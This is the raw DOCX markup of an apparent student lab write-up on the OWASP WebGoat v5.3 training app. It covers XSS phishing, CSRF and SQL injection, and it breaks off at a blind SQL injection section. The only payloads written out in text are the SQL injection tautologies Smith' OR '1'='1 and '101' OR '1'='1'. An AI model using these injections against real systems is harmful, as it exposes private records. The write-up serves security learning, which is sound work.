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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Author</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Shaival Dalal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000001">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Network Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Exploring OWASP WebGoat v5.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following document contains my explorations in the domain of applied network security. We use WebGoat v.5.3 in order to learn more about how exploits are detected and how web applications are exploited to return private information or perform malicious actions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the document does not cover all the exploit domains, it contains helpful comments that may guide in similar analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing with XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We insert the following HTML code in the input field in order to allow us to POST data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4603485" cy="1957388"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="1" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="17699" l="30066" r="27740" t="50442"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4603485" cy="1957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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On entering the HTML, we see</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4583133" cy="1547813"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="10" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="21828" l="40365" r="21760" t="55457"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4583133" cy="15478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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4576763" cy="1575961"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="16" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="27728" l="39867" r="24916" t="50737"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4576763" cy="1575961"/>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E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4410568" cy="1528763"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="11" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="30383" l="38704" r="19601" t="43952"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4410568" cy="1528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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4262438" cy="1618647"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="5" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="14749" l="24252" r="49501" t="67551"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4262438" cy="1618647"/>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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection Flaws</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 1: String SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement used: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="2265.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1570.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2265"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2265"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="282c34"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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Smith' OR '1'='1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We use apostrophes in order to create manually end the statement and insert a new condition of 1=1 which will always be true. Hence returning all the records.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4386263" cy="2363211"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="2" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="13864" l="35382" r="18936" t="42477"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4386263" cy="23632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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1707594" cy="481013"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="15" name="image31.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="53097" l="23754" r="64451" t="41002"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1707594" cy="481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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 3 Numeric SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement Used: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inserting it directly in Chrome’s page using Inspect Element</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="2220.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1585.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2220"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2220"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="282c34"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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'101' OR '1'='1'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4789646" cy="538163"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="8" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="19469" l="11461" r="58970" t="74631"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4789646" cy="5381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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:anchor allowOverlap="1" behindDoc="0" distB="0" distT="0" distL="0" distR="0" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4324350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1562100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1851898" cy="481013"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
            <wp:docPr id="3" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="43952" l="6146" r="81063" t="50147"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1851898" cy="481013"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3300413" cy="1824524"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="7" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="5899" l="21428" r="49169" t="65191"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3300413" cy="18245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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extra Credit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind Numeric SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We use jHijack to run batch POST requests. We enter the success condition where the program will match the string entered in Grep field. In HijackID, we enter:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
